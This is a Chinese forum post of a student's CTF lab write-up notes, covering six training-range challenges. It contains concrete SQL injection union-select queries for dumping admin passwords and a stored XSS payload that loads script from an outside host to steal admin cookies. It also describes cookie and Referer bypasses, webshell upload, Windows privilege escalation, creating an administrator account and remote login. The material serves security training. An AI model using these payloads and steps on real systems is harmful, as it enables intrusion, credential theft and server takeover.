浪小灰灰公开课笔记

kmlz   ·   发表于 2018-06-11 16:43:37   ·   CTF&WP专版

     浪小灰灰学习笔记

公开课靶场作业笔记

第一章 为了女生小芳

1. 点击传送门进入

2. 点击查看新闻 输入and 1=2或者id=1 后加任意字符,看是否报错和报错情况

3. 由此可以知道,这里可能存在sql注入漏洞

4. 测试一下有多少个字段order by @@ 折半寻找

5. 联合查询  and 1=2 union select 1@@database 或者@@version

6. 库版本和库名可以查询出当前库下表名

7. union select 1,group_concat(table_name)from information_schema.tables where table_schema=database()

8. and 1=2 union select 1,password from admin.

 

第二章

1.进入网站,发现是一个asp的网站

2.and 1=2 测试是否有拦截,页面显示传参错误,order by 可用

3.回去看了一下视频和文章,发现可以用cookie。将参数值用cookie传递,可以绕过这题过滤。

4.其余步骤如第一题,注意cookie中需要用+号代替空格

5.得到一串md5加密字符,百度MD5,然后登录网站。

 

 

第三题

1.进入网站后台,登录显示页面提示不允许从外部链接访问

2.http包头中有referer,来源请求的网页。Host

3.修改http包中的数据,登录进入。思路来自于提示和课堂

 

第四题

1.传送,题目提示有xss,去留言区插入

</tExtArEa>'"><sCRiPt sRC=http://xss.fbisb.com/QdHG></sCrIpT>

先提前建立好项目,管理员查看留言时,会盗取管理员cookie到自己的项目里,得到flag

 

第五题

1. 通过cookie登录后台。

2. 寻找可以上传的地方,发现大部分地方都不能修改,不能直接上传脚本,寻找上传图片和修改图片的地方,上传一个图片码,用菜刀链接,得到flag

 

 

 

第六题

 

1. 菜刀链接,发现需要得到的flag的目录有权限,自己权限不够。

2. 上传一个大码,这个不行。。看了解析。上传iis6cmd两个可执行文件

3. 使用其内部的cmd命令行,用iis6.exe 命令 whoami查看权限,权限可以

4. 创建一个用户,将其增加到administators用户组里,权限可以

5. Tasklist -svc 查找远程服务登录是否启用,确定启用。按照pid寻找到其对应的端口netstat -ano。然后用自己的计算机远程登录


打赏我,让我更有动力~

0 条回复   |  直到 2018-6-11 | 1306 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.